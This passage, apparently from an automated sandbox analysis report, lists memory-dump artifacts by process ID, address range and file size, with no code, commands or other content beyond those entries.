                                                                                                                                          • memory/1584-164-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1700-335-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1748-149-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1824-222-0x00000153D4C60000-0x00000153D4CD1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2088-147-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2088-200-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4.9MB

                                                                                                                                          • memory/2088-195-0x0000000000980000-0x0000000000ACA000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/2100-190-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4.6MB

                                                                                                                                          • memory/2100-189-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/2100-148-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2224-209-0x0000015446040000-0x00000154460B1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2236-212-0x0000021307020000-0x0000021307091000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2484-151-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2532-225-0x000001789B740000-0x000001789B7B1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2552-226-0x000002814AB40000-0x000002814ABB1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2560-204-0x0000028C6E5A0000-0x0000028C6E611000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/2680-347-0x0000000003540000-0x0000000003555000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            84KB

                                                                                                                                          • memory/2680-232-0x00000000013F0000-0x0000000001405000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            84KB

                                                                                                                                          • memory/3000-140-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3088-199-0x0000018716600000-0x000001871664C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            304KB

                                                                                                                                          • memory/3088-202-0x00000187166C0000-0x0000018716731000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/3212-310-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3212-305-0x0000000000660000-0x0000000000661000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3212-318-0x0000000002990000-0x0000000002992000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/3212-321-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3212-291-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3376-341-0x0000000005300000-0x0000000005301000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3376-334-0x0000000005840000-0x0000000005841000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3376-205-0x000001E358B50000-0x000001E358BC1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            452KB

                                                                                                                                          • memory/3376-338-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3376-178-0x00007FF7ED0D4060-mapping.dmp
                                                                                                                                          • memory/3376-324-0x0000000000418E5A-mapping.dmp
                                                                                                                                          • memory/3376-349-0x0000000005230000-0x0000000005836000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/3376-323-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/3376-348-0x0000000005340000-0x0000000005341000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3376-356-0x0000000005620000-0x0000000005621000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3416-141-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3512-196-0x0000000000D80000-0x0000000000DDD000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            372KB

                                                                                                                                          • memory/3512-173-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3512-357-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3512-193-0x0000000000C72000-0x0000000000D73000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.0MB

                                                                                                                                          • memory/3752-142-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3760-166-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3800-114-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3856-168-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4060-143-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4140-342-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4144-247-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4144-329-0x0000000001111000-0x000000000119F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            568KB

                                                                                                                                          • memory/4144-343-0x0000000001111000-0x000000000119F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            568KB

                                                                                                                                          • memory/4144-340-0x00000000777D0000-0x000000007795E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/4144-315-0x0000000001110000-0x00000000021FD000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            16.9MB

                                                                                                                                          • memory/4168-362-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4168-374-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-389-0x0000000007DE0000-0x0000000007DE1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-391-0x0000000008090000-0x0000000008091000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-379-0x0000000004CD2000-0x0000000004CD3000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-395-0x0000000008110000-0x0000000008111000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-393-0x0000000007E80000-0x0000000007E81000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-371-0x0000000007740000-0x0000000007741000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4168-370-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4192-252-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4296-360-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4372-355-0x0000000003260000-0x00000000033AA000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/4372-359-0x0000000000400000-0x000000000325A000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            46.4MB

                                                                                                                                          • memory/4372-304-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4532-328-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4532-381-0x000001C447EA0000-0x000001C447F0E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            440KB

                                                                                                                                          • memory/4532-383-0x000001C448280000-0x000001C44834F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            828KB

                                                                                                                                          • memory/4640-372-0x0000000003930000-0x000000000396C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            240KB

                                                                                                                                          • memory/4640-384-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4640-382-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4640-380-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4640-376-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4640-364-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4732-366-0x0000000005250000-0x0000000005B76000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            9.1MB

                                                                                                                                          • memory/4732-378-0x0000000000400000-0x0000000003096000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            44.6MB

                                                                                                                                          • memory/4732-293-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4888-369-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4908-354-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4908-298-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4908-320-0x00000000777D0000-0x000000007795E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/4908-336-0x0000000001070000-0x0000000001071000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4940-231-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4972-274-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-322-0x0000000001420000-0x0000000001439000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            100KB

                                                                                                                                          • memory/4972-237-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4972-325-0x0000000001480000-0x0000000001481000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-413-0x000000001CD20000-0x000000001CD21000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-280-0x000000001B8D0000-0x000000001B8D2000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/4972-411-0x000000001C620000-0x000000001C621000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4972-327-0x000000001C310000-0x000000001C311000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4980-290-0x00000000048D0000-0x00000000048D1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4980-297-0x00000000022C0000-0x00000000022C1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4980-285-0x0000000000040000-0x0000000000041000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4980-299-0x0000000002350000-0x0000000002351000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4980-234-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4992-316-0x0000000000400000-0x0000000002C66000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.4MB

                                                                                                                                          • memory/4992-235-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4992-307-0x00000000001E0000-0x00000000001E9000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                          • memory/5000-352-0x000001D9980E0000-0x000001D99814F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            444KB

                                                                                                                                          • memory/5000-353-0x000001D998150000-0x000001D99821F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            828KB

                                                                                                                                          • memory/5000-289-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5004-283-0x0000000005BF0000-0x0000000005BF1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5004-410-0x0000000005920000-0x0000000005941000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            132KB

                                                                                                                                          • memory/5004-236-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5004-296-0x00000000056F0000-0x00000000056F1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5004-295-0x00000000056F0000-0x0000000005BEE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            5.0MB

                                                                                                                                          • memory/5004-279-0x0000000000E60000-0x0000000000E61000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5004-287-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5020-240-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5028-311-0x0000000004900000-0x000000000499D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            628KB

                                                                                                                                          • memory/5028-238-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5028-337-0x0000000000400000-0x0000000002CBD000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.7MB

                                                                                                                                          • memory/5036-276-0x0000000000620000-0x0000000000621000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5036-241-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5036-288-0x0000000000A90000-0x0000000000A91000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5036-301-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5036-309-0x000000001B3F0000-0x000000001B3F2000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/5036-292-0x0000000000AA0000-0x0000000000AC0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            128KB

                                                                                                                                          • memory/5044-282-0x00000000005A0000-0x00000000005B2000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/5044-243-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5044-278-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            64KB

                                                                                                                                          • memory/5052-239-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5060-244-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5084-317-0x0000000000400000-0x0000000002C75000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.5MB

                                                                                                                                          • memory/5084-242-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5084-313-0x0000000002C80000-0x0000000002DCA000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/5100-302-0x0000015B327A0000-0x0000015B327EE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            312KB

                                                                                                                                          • memory/5100-294-0x00007FF7ED0D4060-mapping.dmp
                                                                                                                                          • memory/5100-308-0x0000015B32AD0000-0x0000015B32B44000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            464KB

                                                                                                                                          • memory/5104-245-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5116-246-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5304-447-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5344-448-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5380-450-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5512-412-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5524-415-0x0000000000418E3E-mapping.dmp
                                                                                                                                          • memory/5632-419-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5908-430-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5976-432-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6024-435-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6044-434-0x0000000000000000-mapping.dmp